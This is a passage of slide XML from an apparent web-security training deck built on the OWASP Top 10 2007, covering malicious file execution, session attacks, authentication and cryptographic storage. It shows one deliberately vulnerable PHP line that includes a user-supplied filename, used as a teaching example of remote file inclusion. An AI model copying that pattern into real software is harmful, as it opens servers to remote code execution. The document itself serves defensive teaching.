      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="911364" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0844109E-0C49-B5FF-DB02-3B7EB06AA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937" y="2877344"/>
            <a:ext cx="43275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1AE3A162-B853-173B-55C7-401FE686DCE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Malicious File Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768003" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C14F03DC-D693-18BD-707B-8FE7AFA1FD9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>“Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>Happens when code is executed on the server from a non-trusted source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>All web applications are vulnerable to malicious file execution if they accept filenames or files from the user. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>Classic example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>PHP is particularly vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>Hacker visits a website that allows uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>Hacker uploads a malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>Hacker learns directory structure and sends the path as a parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>PHP code is executed on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>include $_REQUEST[‘filename’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="24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0FD6D0F6-D19F-6EF1-DA3D-2F0DBE5B8C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Impact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617475" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA730F57-BCB2-11E0-3A60-C0F290ACD10F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Code runs as the current user for the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Can modify, delete anything the user has access to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Can install rootkits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Can take over the entire server if misconfigured (a.k.a. the web server runs as root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="24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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE525FB-E478-F060-A266-8BAD8D3FB50F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618499" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A84838B-7553-D85F-4034-4127D5AAC23C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Architect and design application to avoid it.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Never allow the design to use user-supplied input in any filename for any server-based resource (such as images, XML and XSL transform documents, or script inclusions). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Never use a parameter to execute a Server Side Include directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Add firewall rules to prevent web servers making new connections to external web sites and internal systems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Isolate web server in its own VLAN or private subnet. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Use an indirect object reference map </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Validate - check any user supplied files or filenames taken from the user for legitimate purposes, which cannot obviate other control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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495D3046-9D74-7C4F-E9D3-94757D9AB0B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Insecure Communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644099" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B86146A5-1929-5F3F-75BF-A945BCB2EEA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Sensitive information being sent over an unencrypted channel can be snooped very easily </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Use SSL to pass sensitive information to and from browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Encrypt the transmission of email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Encrypt authentication requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="28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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF83152C-2A2E-C98E-728D-BC1B0AE11FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Authentication Checks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769027" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448EE186-3848-6E22-479A-ED920B189B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Top_10_2007 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>“Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Never store passwords in plaintext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Encrypt or Hash (preferred)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Architect applications to check every request to see that the authentication data is still valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Issue a new session token when the user authenticates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>If you absolutely must use “remember me” functionality, use a difficult to guess authentication cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Authentication data is sent with every request, so protect it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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8574ACE4-CBBC-2A94-793B-D0B2996FF3D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Session Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630787" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10E6E41-662E-1F20-6B3C-C9DFF2372857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Session Fixation: The hacker predicts a valid session key (usually via phishing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Session Hijacking: The hacker masquerades as another user by stealing the users session id (usually via XSS)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id="{FCCD58FE-DDA5-7E4F-1A71-1AB8083A7030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632835" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{741A3DA3-1F7B-5C34-CD8D-A36A3F3FEA59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Use built in session management!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Most application servers do a pretty good job of this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Use secure randomly generated session keys to make prediction impossible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Don’t expose the user to session ids if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Use reasonable session timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="28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0AB4EE0E-2E46-F000-10DF-DC9F82C073F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Insecure Cryptographic Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="770051" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDD93092-C8D0-59FD-557F-971446B09DB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>“Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Use latest standard encryption methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>They are standards for a reason!  And they change over time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>strong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>encryption methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Stop using Message-Digest Algorithm 5 (MD5), Secure Hash Algorithm  (SHA1), Data Encryption Standard (DES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Use SHA-256, Advanced Encryption Standard (AES), Rivest/Shamir/Adleman Public Key Encryption (RSA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Encrypt stored passwords with above methods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FB055322-1A6A-D015-E5A5-4340AC36DB38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Web Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361475" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C0FD57-97AC-4250-DF9D-A0C582EE7489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
